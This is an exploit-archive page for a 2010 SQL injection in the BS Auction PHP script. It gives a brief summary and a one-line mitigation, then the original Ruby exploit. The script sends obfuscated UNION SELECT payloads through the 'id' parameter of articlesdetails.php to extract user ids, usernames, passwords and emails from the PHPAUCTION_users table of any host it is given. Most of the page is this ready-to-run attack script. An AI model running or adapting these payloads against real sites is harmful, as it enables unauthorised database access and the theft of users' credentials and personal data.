header-logo
Suggest Exploit
vendor:
BS Auction
by:
Easy Laster
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BS Auction
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

BS Auction <= SQL Injection Vulnerability Exploit

This exploit targets the BS Auction script and allows for SQL injection through the 'id' parameter in the articlesdetails.php file. The exploit is written in Ruby and requires the host, path, and user ID as input. It was discovered by Easy Laster.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : BS Auction  <= SQL Injection Vulnerability Exploit
+Autor : Easy Laster
+ICQ : 11-051-551
+Date   : 06.07.2010
+Script  : BS Auction 
+Price : $24.95
+Language :PHP
+Exploit Language : ruby
+Discovered by Easy Laster 4004-security-project.com
+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco.
   
---------------------------------------------------------------------------------------
                                                                                        
 ___ ___ ___ ___                         _ _           _____           _         _
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|         
   
   
----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/Auction_Software/articlesdetails.php?id=
----------------------------------------------------------------------------------------
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
require 'net/http'
print "
#########################################################
#               4004-Security-Project.com               #
#########################################################
#                   BS Auction SQL Injection            #
#                    Vulnerability Exploit              #
#                    Using Host+Path+userid             #
#                      demo.com /script/ 1              #
#                         Easy Laster                   #
#########################################################
"
block = "#########################################################"
print ""+ block +""
print "\nEnter host name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter script path (/script/)->"
path=gets.chomp
print ""+ block +""
print "\nEnter userid (userid)->"
userid=gets.chomp
print ""+ block +""
begin
dir = "articlesdetails.php?id=1%27+and+1=0+/**/UnIoN+/**/SeLeCt/**/+1,gRoUp_cOnCat%280x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23%29,3+/**/from+/**/PHPAUCTION_users/**/+wHeRe+/**/id="+userid+"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nThe ID is  -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "articlesdetails.php?id=1%27+and+1=0+/**/UnIoN+/**/SeLeCt/**/+1,gRoUp_cOnCat%280x23,0x23,0x23,0x23,0x23,name,0x23,0x23,0x23,0x23,0x23%29,3+/**/from+/**/PHPAUCTION_users/**/+wHeRe+/**/id="+userid+"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nThe username is  -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "articlesdetails.php?id=1%27+and+1=0+/**/UnIoN+/**/SeLeCt/**/+1,gRoUp_cOnCat%280x23,0x23,0x23,0x23,0x23,password,0x23,0x23,0x23,0x23,0x23%29,3+/**/from+/**/PHPAUCTION_users/**/+wHeRe+/**/id="+userid+"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nThe password is  -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "articlesdetails.php?id=1%27+and+1=0+/**/UnIoN+/**/SeLeCt/**/+1,gRoUp_cOnCat%280x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23%29,3+/**/from+/**/PHPAUCTION_users/**/+wHeRe+/**/id="+userid+"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nThe email is  -> "+(/#####(.+)#####/).match(resp.body)[1]
rescue
print "\nExploit failed"
end